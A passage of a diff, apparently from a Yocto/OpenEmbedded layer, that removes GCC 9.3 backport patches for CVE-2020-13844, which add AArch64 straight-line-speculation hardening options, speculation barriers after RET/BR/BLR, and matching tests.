-+ return aarch64_sls_hardening & SLS_BLR;
-+}
-+
-+/* As of yet we only allow setting these options globally, in the future we may
-+ allow setting them per function. */
-+static void
-+aarch64_validate_sls_mitigation (const char *const_str)
-+{
-+ char *token_save = NULL;
-+ char *str = NULL;
-+
-+ if (strcmp (const_str, "none") == 0)
-+ {
-+ aarch64_sls_hardening = SLS_NONE;
-+ return;
-+ }
-+ if (strcmp (const_str, "all") == 0)
-+ {
-+ aarch64_sls_hardening = SLS_ALL;
-+ return;
-+ }
-+
-+ char *str_root = xstrdup (const_str);
-+ str = strtok_r (str_root, ",", &token_save);
-+ if (!str)
-+ error ("invalid argument given to %<-mharden-sls=%>");
-+
-+ int temp = SLS_NONE;
-+ while (str)
-+ {
-+ if (strcmp (str, "blr") == 0)
-+ temp |= SLS_BLR;
-+ else if (strcmp (str, "retbr") == 0)
-+ temp |= SLS_RETBR;
-+ else if (strcmp (str, "none") == 0 || strcmp (str, "all") == 0)
-+ {
-+ error ("%<%s%> must be by itself for %<-mharden-sls=%>", str);
-+ break;
-+ }
-+ else
-+ {
-+ error ("invalid argument %<%s%> for %<-mharden-sls=%>", str);
-+ break;
-+ }
-+ str = strtok_r (NULL, ",", &token_save);
-+ }
-+ aarch64_sls_hardening = (aarch64_sls_hardening_type) temp;
-+ free (str_root);
-+}
-+
- /* Parses CONST_STR for branch protection features specified in
- aarch64_branch_protect_types, and set any global variables required. Returns
- the parsing result and assigns LAST_STR to the last processed token from
-@@ -11972,6 +12045,9 @@ aarch64_override_options (void)
- selected_arch = NULL;
- selected_tune = NULL;
-
-+ if (aarch64_harden_sls_string)
-+ aarch64_validate_sls_mitigation (aarch64_harden_sls_string);
-+
- if (aarch64_branch_protection_string)
- aarch64_validate_mbranch_protection (aarch64_branch_protection_string);
-
-diff --git a/gcc/config/aarch64/aarch64.opt b/gcc/config/aarch64/aarch64.opt
-index 3c6d1cc90..d27ab6df8 100644
---- a/gcc/config/aarch64/aarch64.opt
-+++ b/gcc/config/aarch64/aarch64.opt
-@@ -71,6 +71,10 @@ mgeneral-regs-only
- Target Report RejectNegative Mask(GENERAL_REGS_ONLY) Save
- Generate code which uses only the general registers.
-
-+mharden-sls=
-+Target RejectNegative Joined Var(aarch64_harden_sls_string)
-+Generate code to mitigate against straight line speculation.
-+
- mfix-cortex-a53-835769
- Target Report Var(aarch64_fix_a53_err835769) Init(2) Save
- Workaround for ARM Cortex-A53 Erratum number 835769.
-diff --git a/gcc/doc/invoke.texi b/gcc/doc/invoke.texi
-index 2f7ffe456..5f04a7d2b 100644
---- a/gcc/doc/invoke.texi
-+++ b/gcc/doc/invoke.texi
-@@ -638,6 +638,7 @@ Objective-C and Objective-C++ Dialects}.
- -mpc-relative-literal-loads @gol
- -msign-return-address=@var{scope} @gol
- -mbranch-protection=@var{none}|@var{standard}|@var{pac-ret}[+@var{leaf}]|@var{bti} @gol
-+-mharden-sls=@var{opts} @gol
- -march=@var{name} -mcpu=@var{name} -mtune=@var{name} @gol
- -moverride=@var{string} -mverbose-cost-dump @gol
- -mstack-protector-guard=@var{guard} -mstack-protector-guard-reg=@var{sysreg} @gol
-@@ -15955,6 +15956,17 @@ argument @samp{leaf} can be used to extend the signing to include leaf
- functions.
- @samp{bti} turns on branch target identification mechanism.
-
-+@item -mharden-sls=@var{opts}
-+@opindex mharden-sls
-+Enable compiler hardening against straight line speculation (SLS).
-+@var{opts} is a comma-separated list of the following options:
-+@table @samp
-+@item retbr
-+@item blr
-+@end table
-+In addition, @samp{-mharden-sls=all} enables all SLS hardening while
-+@samp{-mharden-sls=none} disables all SLS hardening.
-+
- @item -msve-vector-bits=@var{bits}
- @opindex msve-vector-bits
- Specify the number of bits in an SVE vector register. This option only has
---
-2.25.1
-
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch b/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch
deleted file mode 100644
index c972088d2b..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch
+++ /dev/null
@@ -1,600 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From dc586a749228ecfb71f72ec2ca10e6f7b6874af3 Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:59 +0100
-Subject: [PATCH 2/3] aarch64: Introduce SLS mitigation for RET and BR
- instructions
-
-Instructions following RET or BR are not necessarily executed. In order
-to avoid speculation past RET and BR we can simply append a speculation
-barrier.
-
-Since these speculation barriers will not be architecturally executed,
-they are not expected to add a high performance penalty.
-
-The speculation barrier is to be SB when targeting architectures which
-have this enabled, and DSB SY + ISB otherwise.
-
-We add tests for each of the cases where such an instruction was seen.
-
-This is implemented by modifying each machine description pattern that
-emits either a RET or a BR instruction. We choose not to use something
-like `TARGET_ASM_FUNCTION_EPILOGUE` since it does not affect the
-`indirect_jump`, `jump`, `sibcall_insn` and `sibcall_value_insn`
-patterns and we find it preferable to implement the functionality in the
-same way for every pattern.
-
-There is one particular case which is slightly tricky. The
-implementation of TARGET_ASM_TRAMPOLINE_TEMPLATE uses a BR which needs
-to be mitigated against. The trampoline template is used *once* per
-compilation unit, and the TRAMPOLINE_SIZE is exposed to the user via the
-builtin macro __LIBGCC_TRAMPOLINE_SIZE__.
-In the future we may implement function specific attributes to turn on
-and off hardening on a per-function basis.
-The fixed nature of the trampoline described above implies it will be
-safer to ensure this speculation barrier is always used.
-
-Testing:
- Bootstrap and regtest done on aarch64-none-linux
- Used a temporary hack(1) to use these options on every test in the
- testsuite and a script to check that the output never emitted an
- unmitigated RET or BR.
-
-1) Temporary hack was a change to the testsuite to always use
-`-save-temps` and run a script on the assembly output of those
-compilations which produced one to ensure every RET or BR is immediately
-followed by a speculation barrier.
-
-(cherry picked from be178ecd5ac1fe1510d960ff95c66d0ff831afe1)
-
-gcc/ChangeLog:
-
- * config/aarch64/aarch64-protos.h (aarch64_sls_barrier): New.
- * config/aarch64/aarch64.c (aarch64_output_casesi): Emit
- speculation barrier after BR instruction if needs be.
- (aarch64_trampoline_init): Handle ptr_mode value & adjust size
- of code copied.
- (aarch64_sls_barrier): New.
- (aarch64_asm_trampoline_template): Add needed barriers.
- * config/aarch64/aarch64.h (AARCH64_ISA_SB): New.
- (TARGET_SB): New.
- (TRAMPOLINE_SIZE): Account for barrier.
- * config/aarch64/aarch64.md (indirect_jump, *casesi_dispatch,
- simple_return, *do_return, *sibcall_insn, *sibcall_value_insn):
- Emit barrier if needs be, also account for possible barrier using
- "sls_length" attribute.
- (sls_length): New attribute.
- (length): Determine default using any non-default sls_length
- value.
-
-gcc/testsuite/ChangeLog:
-
- * gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c: New test.
- * gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c:
- New test.
- * gcc.target/aarch64/sls-mitigation/sls-mitigation.exp: New file.
- * lib/target-supports.exp (check_effective_target_aarch64_asm_sb_ok):
- New proc.
----
- gcc/config/aarch64/aarch64-protos.h | 1 +
- gcc/config/aarch64/aarch64.c | 41 +++++-
- gcc/config/aarch64/aarch64.h | 10 +-
- gcc/config/aarch64/aarch64.md | 75 ++++++++---
- .../sls-mitigation/sls-miti-retbr-pacret.c | 15 +++
- .../aarch64/sls-mitigation/sls-miti-retbr.c | 119 ++++++++++++++++++
- .../aarch64/sls-mitigation/sls-mitigation.exp | 73 +++++++++++
- gcc/testsuite/lib/target-supports.exp | 3 +-
- 8 files changed, 312 insertions(+), 25 deletions(-)
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index 31493f412..885eae893 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -644,6 +644,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
-
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
-
-+const char *aarch64_sls_barrier (int);
- extern bool aarch64_harden_sls_retbr_p (void);
- extern bool aarch64_harden_sls_blr_p (void);
-
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index 269ff6c92..dff61105c 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -8412,8 +8412,8 @@ aarch64_return_addr (int count, rtx frame ATTRIBUTE_UNUSED)
- static void
- aarch64_asm_trampoline_template (FILE *f)
- {
-- int offset1 = 16;
-- int offset2 = 20;
-+ int offset1 = 24;
-+ int offset2 = 28;
-
- if (aarch64_bti_enabled ())
- {
-@@ -8436,6 +8436,17 @@ aarch64_asm_trampoline_template (FILE *f)
- }
- asm_fprintf (f, "\tbr\t%s\n", reg_names [IP1_REGNUM]);
-
-+ /* We always emit a speculation barrier.
-+ This is because the same trampoline template is used for every nested
-+ function. Since nested functions are not particularly common or
-+ performant we don't worry too much about the extra instructions to copy
-+ around.
-+ This is not yet a problem, since we have not yet implemented function
-+ specific attributes to choose between hardening against straight line
-+ speculation or not, but such function specific attributes are likely to
-+ happen in the future. */
-+ asm_fprintf (f, "\tdsb\tsy\n\tisb\n");
-+
- /* The trampoline needs an extra padding instruction. In case if BTI is
- enabled the padding instruction is replaced by the BTI instruction at
- the beginning. */
-@@ -8450,10 +8461,14 @@ static void
- aarch64_trampoline_init (rtx m_tramp, tree fndecl, rtx chain_value)
- {
- rtx fnaddr, mem, a_tramp;
-- const int tramp_code_sz = 16;
-+ const int tramp_code_sz = 24;
-
- /* Don't need to copy the trailing D-words, we fill those in below. */
-- emit_block_move (m_tramp, assemble_trampoline_template (),
-+ /* We create our own memory address in Pmode so that `emit_block_move` can
-+ use parts of the backend which expect Pmode addresses. */
-+ rtx temp = convert_memory_address (Pmode, XEXP (m_tramp, 0));
-+ emit_block_move (gen_rtx_MEM (BLKmode, temp),
-+ assemble_trampoline_template (),
- GEN_INT (tramp_code_sz), BLOCK_OP_NORMAL);
- mem = adjust_address (m_tramp, ptr_mode, tramp_code_sz);
- fnaddr = XEXP (DECL_RTL (fndecl), 0);
-@@ -8640,6 +8655,8 @@ aarch64_output_casesi (rtx *operands)
- output_asm_insn (buf, operands);
- output_asm_insn (patterns[index][1], operands);
- output_asm_insn ("br\t%3", operands);
-+ output_asm_insn (aarch64_sls_barrier (aarch64_harden_sls_retbr_p ()),
-+ operands);
- assemble_label (asm_out_file, label);
- return "";
- }
-@@ -18976,6 +18993,22 @@ aarch64_file_end_indicate_exec_stack ()
- #undef GNU_PROPERTY_AARCH64_FEATURE_1_BTI
- #undef GNU_PROPERTY_AARCH64_FEATURE_1_AND
-
-+/* Helper function for straight line speculation.
-+ Return what barrier should be emitted for straight line speculation
-+ mitigation.
-+ When not mitigating against straight line speculation this function returns
-+ an empty string.
-+ When mitigating against straight line speculation, use:
-+ * SB when the v8.5-A SB extension is enabled.
-+ * DSB+ISB otherwise. */
-+const char *
-+aarch64_sls_barrier (int mitigation_required)
-+{
-+ return mitigation_required
-+ ? (TARGET_SB ? "sb" : "dsb\tsy\n\tisb")
-+ : "";
-+}
-+
- /* Target-specific selftests. */
-
- #if CHECKING_P
-diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
-index 772a97296..72ddc6fd9 100644
---- a/gcc/config/aarch64/aarch64.h
-+++ b/gcc/config/aarch64/aarch64.h
-@@ -235,6 +235,7 @@ extern unsigned aarch64_architecture_version;
- #define AARCH64_ISA_F16FML (aarch64_isa_flags & AARCH64_FL_F16FML)
- #define AARCH64_ISA_RCPC8_4 (aarch64_isa_flags & AARCH64_FL_RCPC8_4)
- #define AARCH64_ISA_V8_5 (aarch64_isa_flags & AARCH64_FL_V8_5)
-+#define AARCH64_ISA_SB (aarch64_isa_flags & AARCH64_FL_SB)
-
- /* Crypto is an optional extension to AdvSIMD. */
- #define TARGET_CRYPTO (TARGET_SIMD && AARCH64_ISA_CRYPTO)
-@@ -285,6 +286,9 @@ extern unsigned aarch64_architecture_version;
- #define TARGET_FIX_ERR_A53_835769_DEFAULT 1
- #endif
-
-+/* SB instruction is enabled through +sb. */
-+#define TARGET_SB (AARCH64_ISA_SB)
-+
- /* Apply the workaround for Cortex-A53 erratum 835769. */
- #define TARGET_FIX_ERR_A53_835769 \
- ((aarch64_fix_a53_err835769 == 2) \
-@@ -931,8 +935,10 @@ typedef struct
-
- #define RETURN_ADDR_RTX aarch64_return_addr
-
--/* BTI c + 3 insns + 2 pointer-sized entries. */
--#define TRAMPOLINE_SIZE (TARGET_ILP32 ? 24 : 32)
-+/* BTI c + 3 insns
-+ + sls barrier of DSB + ISB.
-+ + 2 pointer-sized entries. */
-+#define TRAMPOLINE_SIZE (24 + (TARGET_ILP32 ? 8 : 16))
-
- /* Trampolines contain dwords, so must be dword aligned. */
- #define TRAMPOLINE_ALIGNMENT 64
-diff --git a/gcc/config/aarch64/aarch64.md b/gcc/config/aarch64/aarch64.md
-index cc5a887d4..494aee964 100644
---- a/gcc/config/aarch64/aarch64.md
-+++ b/gcc/config/aarch64/aarch64.md
-@@ -331,10 +331,25 @@
- ;; Attribute that specifies whether the alternative uses MOVPRFX.
- (define_attr "movprfx" "no,yes" (const_string "no"))
-
-+;; Attribute to specify that an alternative has the length of a single
-+;; instruction plus a speculation barrier.
-+(define_attr "sls_length" "none,retbr,casesi" (const_string "none"))
-+
- (define_attr "length" ""
- (cond [(eq_attr "movprfx" "yes")
- (const_int 8)
-- ] (const_int 4)))
-+
-+ (eq_attr "sls_length" "retbr")
-+ (cond [(match_test "!aarch64_harden_sls_retbr_p ()") (const_int 4)
-+ (match_test "TARGET_SB") (const_int 8)]
-+ (const_int 12))
-+
-+ (eq_attr "sls_length" "casesi")
-+ (cond [(match_test "!aarch64_harden_sls_retbr_p ()") (const_int 16)
-+ (match_test "TARGET_SB") (const_int 20)]
-+ (const_int 24))
-+ ]
-+ (const_int 4)))
-
- ;; Strictly for compatibility with AArch32 in pipeline models, since AArch64 has
- ;; no predicated insns.
-@@ -370,8 +385,12 @@
- (define_insn "indirect_jump"
- [(set (pc) (match_operand:DI 0 "register_operand" "r"))]
- ""
-- "br\\t%0"
-- [(set_attr "type" "branch")]
-+ {
-+ output_asm_insn ("br\\t%0", operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+ }
-+ [(set_attr "type" "branch")
-+ (set_attr "sls_length" "retbr")]
- )
-
- (define_insn "jump"
-@@ -657,7 +676,7 @@
- "*
- return aarch64_output_casesi (operands);
- "
-- [(set_attr "length" "16")
-+ [(set_attr "sls_length" "casesi")
- (set_attr "type" "branch")]
- )
-
-@@ -736,14 +755,18 @@
- [(return)]
- ""
- {
-+ const char *ret = NULL;
- if (aarch64_return_address_signing_enabled ()
- && TARGET_ARMV8_3
- && !crtl->calls_eh_return)
-- return "retaa";
--
-- return "ret";
-+ ret = "retaa";
-+ else
-+ ret = "ret";
-+ output_asm_insn (ret, operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
- }
-- [(set_attr "type" "branch")]
-+ [(set_attr "type" "branch")
-+ (set_attr "sls_length" "retbr")]
- )
-
- (define_expand "return"
-@@ -755,8 +778,12 @@
- (define_insn "simple_return"
- [(simple_return)]
- "aarch64_use_simple_return_insn_p ()"
-- "ret"
-- [(set_attr "type" "branch")]
-+ {
-+ output_asm_insn ("ret", operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+ }
-+ [(set_attr "type" "branch")
-+ (set_attr "sls_length" "retbr")]
- )
-
- (define_insn "*cb<optab><mode>1"
-@@ -947,10 +974,16 @@
- (match_operand 1 "" ""))
- (return)]
- "SIBLING_CALL_P (insn)"
-- "@
-- br\\t%0
-- b\\t%c0"
-- [(set_attr "type" "branch, branch")]
-+ {
-+ if (which_alternative == 0)
-+ {
-+ output_asm_insn ("br\\t%0", operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+ }
-+ return "b\\t%c0";
-+ }
-+ [(set_attr "type" "branch, branch")
-+ (set_attr "sls_length" "retbr,none")]
- )
-
- (define_insn "*sibcall_value_insn"
-@@ -960,10 +993,16 @@
- (match_operand 2 "" "")))
- (return)]
- "SIBLING_CALL_P (insn)"
-- "@
-- br\\t%1
-- b\\t%c1"
-- [(set_attr "type" "branch, branch")]
-+ {
-+ if (which_alternative == 0)
-+ {
-+ output_asm_insn ("br\\t%1", operands);
-+ return aarch64_sls_barrier (aarch64_harden_sls_retbr_p ());
-+ }
-+ return "b\\t%c1";
-+ }
-+ [(set_attr "type" "branch, branch")
-+ (set_attr "sls_length" "retbr,none")]
- )
-
- ;; Call subroutine returning any type.
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
-new file mode 100644
-index 000000000..7656123ee
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr-pacret.c
-@@ -0,0 +1,15 @@
-+/* Avoid ILP32 since pacret is only available for LP64 */
-+/* { dg-do compile { target { ! ilp32 } } } */
-+/* { dg-additional-options "-mharden-sls=retbr -mbranch-protection=pac-ret -march=armv8.3-a" } */
-+
-+/* Testing the do_return pattern for retaa. */
-+long retbr_subcall(void);
-+long retbr_do_return_retaa(void)
-+{
-+ return retbr_subcall()+1;
-+}
-+
-+/* Ensure there are no BR or RET instructions which are not directly followed
-+ by a speculation barrier. */
-+/* { dg-final { scan-assembler-not {\t(br|ret|retaa)\tx[0-9][0-9]?\n\t(?!dsb\tsy\n\tisb)} } } */
-+/* { dg-final { scan-assembler-not {ret\t} } } */
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
-new file mode 100644
-index 000000000..573b30cdc
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-retbr.c
-@@ -0,0 +1,119 @@
-+/* We ensure that -Wpedantic is off since it complains about the trampolines
-+ we explicitly want to test. */
-+/* { dg-additional-options "-mharden-sls=retbr -Wno-pedantic " } */
-+/*
-+ Ensure that the SLS hardening of RET and BR leaves no unprotected RET/BR
-+ instructions.
-+ */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+ foo *x;
-+ bar *y;
-+ int left;
-+ int right;
-+};
-+
-+int
-+retbr_sibcall_value_insn (struct sls_testclass x)
-+{
-+ return x.x(x.left, x.right);
-+}
-+
-+void
-+retbr_sibcall_insn (struct sls_testclass x)
-+{
-+ x.y(x.left, x.right);
-+}
-+
-+/* Aim to test two different returns.
-+ One that introduces a tail call in the middle of the function, and one that
-+ has a normal return. */
-+int
-+retbr_multiple_returns (struct sls_testclass x)
-+{
-+ int temp;
-+ if (x.left % 10)
-+ return x.x(x.left, 100);
-+ else if (x.right % 20)
-+ {
-+ return x.x(x.left * x.right, 100);
-+ }
-+ temp = x.left % x.right;
-+ temp *= 100;
-+ temp /= 2;
-+ return temp % 3;
-+}
-+
-+void
-+retbr_multiple_returns_void (struct sls_testclass x)
-+{
-+ if (x.left % 10)
-+ {
-+ x.y(x.left, 100);
-+ }
-+ else if (x.right % 20)
-+ {
-+ x.y(x.left * x.right, 100);
-+ }
-+ return;
-+}
-+
-+/* Testing the casesi jump via register. */
-+__attribute__ ((optimize ("Os")))
-+int
-+retbr_casesi_dispatch (struct sls_testclass x)
-+{
-+ switch (x.left)
-+ {
-+ case -5:
-+ return -2;
-+ case -3:
-+ return -1;
-+ case 0:
-+ return 0;
-+ case 3:
-+ return 1;
-+ case 5:
-+ break;
-+ default:
-+ __builtin_unreachable ();
-+ }
-+ return x.right;
-+}
-+
-+/* Testing the BR in trampolines is mitigated against. */
-+void f1 (void *);
-+void f3 (void *, void (*)(void *));
-+void f2 (void *);
-+
-+int
-+retbr_trampolines (void *a, int b)
-+{
-+ if (!b)
-+ {
-+ f1 (a);
-+ return 1;
-+ }
-+ if (b)
-+ {
-+ void retbr_tramp_internal (void *c)
-+ {
-+ if (c == a)
-+ f2 (c);
-+ }
-+ f3 (a, retbr_tramp_internal);
-+ }
-+ return 0;
-+}
-+
-+/* Testing the indirect_jump pattern. */
-+void
-+retbr_indirect_jump (int *buf)
-+{
-+ __builtin_longjmp(buf, 1);
-+}
-+
-+/* Ensure there are no BR or RET instructions which are not directly followed
-+ by a speculation barrier. */
-+/* { dg-final { scan-assembler-not {\t(br|ret|retaa)\tx[0-9][0-9]?\n\t(?!dsb\tsy\n\tisb|sb)} } } */
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
-new file mode 100644
-index 000000000..812250379
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-mitigation.exp
-@@ -0,0 +1,73 @@
-+# Regression driver for SLS mitigation on AArch64.
-+# Copyright (C) 2020 Free Software Foundation, Inc.
-+# Contributed by ARM Ltd.
-+#
-+# This file is part of GCC.
-+#
-+# GCC is free software; you can redistribute it and/or modify it
-+# under the terms of the GNU General Public License as published by
-+# the Free Software Foundation; either version 3, or (at your option)
-+# any later version.
-+#
-+# GCC is distributed in the hope that it will be useful, but
-+# WITHOUT ANY WARRANTY; without even the implied warranty of
-+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-+# General Public License for more details.
-+#
-+# You should have received a copy of the GNU General Public License
-+# along with GCC; see the file COPYING3. If not see
-+# <http://www.gnu.org/licenses/>. */
-+
-+# Exit immediately if this isn't an AArch64 target.
-+if {![istarget aarch64*-*-*] } then {
-+ return
-+}
-+
-+# Load support procs.
-+load_lib gcc-dg.exp
-+load_lib torture-options.exp
-+
-+# If a testcase doesn't have special options, use these.
-+global DEFAULT_CFLAGS
-+if ![info exists DEFAULT_CFLAGS] then {
-+ set DEFAULT_CFLAGS " "
-+}
-+
-+# Initialize `dg'.
-+dg-init
-+torture-init
-+
-+# Use different architectures as well as the normal optimisation options.
-+# (i.e. use both SB and DSB+ISB barriers).
-+
-+set save-dg-do-what-default ${dg-do-what-default}
-+# Main loop.
-+# Run with torture tests (i.e. a bunch of different optimisation levels) just
-+# to increase test coverage.
-+set dg-do-what-default assemble
-+gcc-dg-runtest [lsort [glob -nocomplain $srcdir/$subdir/*.\[cCS\]]] \
-+ "-save-temps" $DEFAULT_CFLAGS
-+
-+# Run the same tests but this time with SB extension.
-+# Since not all supported assemblers will support that extension we decide
-+# whether to assemble or just compile based on whether the extension is
-+# supported for the available assembler.
-+
-+set templist {}
-+foreach x $DG_TORTURE_OPTIONS {
-+ lappend templist "$x -march=armv8.3-a+sb "
-+ lappend templist "$x -march=armv8-a+sb "
-+}
-+set-torture-options $templist
-+if { [check_effective_target_aarch64_asm_sb_ok] } {
-+ set dg-do-what-default assemble
-+} else {
-+ set dg-do-what-default compile
-+}
-+gcc-dg-runtest [lsort [glob -nocomplain $srcdir/$subdir/*.\[cCS\]]] \
-+ "-save-temps" $DEFAULT_CFLAGS
-+set dg-do-what-default ${save-dg-do-what-default}
-+
-+# All done.
-+torture-finish
-+dg-finish
-diff --git a/gcc/testsuite/lib/target-supports.exp b/gcc/testsuite/lib/target-supports.exp
-index ea9a50ccb..79482f9b6 100644
---- a/gcc/testsuite/lib/target-supports.exp
-+++ b/gcc/testsuite/lib/target-supports.exp
-@@ -8579,7 +8579,8 @@ proc check_effective_target_aarch64_tiny { } {
- # Create functions to check that the AArch64 assembler supports the
- # various architecture extensions via the .arch_extension pseudo-op.
-
--foreach { aarch64_ext } { "fp" "simd" "crypto" "crc" "lse" "dotprod" "sve"} {
-+foreach { aarch64_ext } { "fp" "simd" "crypto" "crc" "lse" "dotprod" "sve"
-+ "sb"} {
- eval [string map [list FUNC $aarch64_ext] {
- proc check_effective_target_aarch64_asm_FUNC_ok { } {
- if { [istarget aarch64*-*-*] } {
---
-2.25.1
-
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch b/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch
deleted file mode 100644
index 6dffef0a34..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch
+++ /dev/null
@@ -1,659 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From 2155170525f93093b90a1a065e7ed71a925566e9 Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:59 +0100
-Subject: [PATCH 3/3] aarch64: Mitigate SLS for BLR instruction
-
-This patch introduces the mitigation for Straight Line Speculation past
-the BLR instruction.
-
-This mitigation replaces BLR instructions with a BL to a stub which uses
-a BR to jump to the original value. These function stubs are then
-appended with a speculation barrier to ensure no straight line
-speculation happens after these jumps.
-
-When optimising for speed we use a set of stubs for each function since
-this should help the branch predictor make more accurate predictions
-about where a stub should branch.
-
-When optimising for size we use one set of stubs for all functions.
-This set of stubs can have human readable names, and we are using
-`__call_indirect_x<N>` for register x<N>.
-
-When BTI branch protection is enabled the BLR instruction can jump to a
-`BTI c` instruction using any register, while the BR instruction can
-only jump to a `BTI c` instruction using the x16 or x17 registers.
-Hence, in order to ensure this transformation is safe we mov the value
-of the original register into x16 and use x16 for the BR.
-
-As an example when optimising for size:
-a
- BLR x0
-instruction would get transformed to something like
- BL __call_indirect_x0
-where __call_indirect_x0 labels a thunk that contains
-__call_indirect_x0:
- MOV X16, X0
- BR X16
- <speculation barrier>
-
-The first version of this patch used local symbols specific to a
-compilation unit to try and avoid relocations.
-This was mistaken since functions coming from the same compilation unit
-can still be in different sections, and the assembler will insert
-relocations at jumps between sections.
-
-On any relocation the linker is permitted to emit a veneer to handle
-jumps between symbols that are very far apart. The registers x16 and
-x17 may be clobbered by these veneers.
-Hence the function stubs cannot rely on the values of x16 and x17 being
-the same as just before the function stub is called.
-
-Similar can be said for the hot/cold partitioning of single functions,
-so function-local stubs have the same restriction.
-
-This updated version of the patch never emits function stubs for x16 and
-x17, and instead forces other registers to be used.
-
-Given the above, there is now no benefit to local symbols (since they
-are not enough to avoid dealing with linker intricacies). This patch
-now uses global symbols with hidden visibility each stored in their own
-COMDAT section. This means stubs can be shared between compilation
-units while still avoiding the PLT indirection.
-
-This patch also removes the `__call_indirect_x30` stub (and
-function-local equivalent) which would simply jump back to the original
-location.
-
-The function-local stubs are emitted to the assembly output file in one
-chunk, which means we need not add the speculation barrier directly
-after each one.
-This is because we know for certain that the instructions directly after
-the BR in all but the last function stub will be from another one of
-these stubs and hence will not contain a speculation gadget.
-Instead we add a speculation barrier at the end of the sequence of
-stubs.
-
-The global stubs are emitted in COMDAT/.linkonce sections by
-themselves so that the linker can remove duplicates from multiple object
-files. This means they are not emitted in one chunk, and each one must
-include the speculation barrier.
-
-Another difference is that since the global stubs are shared across
-compilation units we do not know that all functions will be targeting an
-architecture supporting the SB instruction.
-Rather than provide multiple stubs for each architecture, we provide a
-stub that will work for all architectures -- using the DSB+ISB barrier.
-
-This mitigation does not apply for BLR instructions in the following
-places:
-- Some accesses to thread-local variables use a code sequence with a BLR
- instruction. This code sequence is part of the binary interface between
- compiler and linker. If this BLR instruction needs to be mitigated, it'd
- probably be best to do so in the linker. It seems that the code sequence
- for thread-local variable access is unlikely to lead to a Spectre Revalation
- Gadget.
-- PLT stubs are produced by the linker and each contain a BLR instruction.
- It seems that at most only after the last PLT stub a Spectre Revalation
- Gadget might appear.
-
-Testing:
- Bootstrap and regtest on AArch64
- (with BOOT_CFLAGS="-mharden-sls=retbr,blr")
- Used a temporary hack(1) in gcc-dg.exp to use these options on every
- test in the testsuite, a slight modification to emit the speculation
- barrier after every function stub, and a script to check that the
- output never emitted a BLR, or unmitigated BR or RET instruction.
- Similar on an aarch64-none-elf cross-compiler.
-
-1) Temporary hack emitted a speculation barrier at the end of every stub
-function, and used a script to ensure that:
- a) Every RET or BR is immediately followed by a speculation barrier.
- b) No BLR instruction is emitted by compiler.
-
-(cherry picked from 96b7f495f9269d5448822e4fc28882edb35a58d7)
-
-gcc/ChangeLog:
-
- * config/aarch64/aarch64-protos.h (aarch64_indirect_call_asm):
- New declaration.
- * config/aarch64/aarch64.c (aarch64_regno_regclass): Handle new
- stub registers class.
- (aarch64_class_max_nregs): Likewise.
- (aarch64_register_move_cost): Likewise.
- (aarch64_sls_shared_thunks): Global array to store stub labels.
- (aarch64_sls_emit_function_stub): New.
- (aarch64_create_blr_label): New.
- (aarch64_sls_emit_blr_function_thunks): New.
- (aarch64_sls_emit_shared_blr_thunks): New.
- (aarch64_asm_file_end): New.
- (aarch64_indirect_call_asm): New.
- (TARGET_ASM_FILE_END): Use aarch64_asm_file_end.
- (TARGET_ASM_FUNCTION_EPILOGUE): Use
- aarch64_sls_emit_blr_function_thunks.
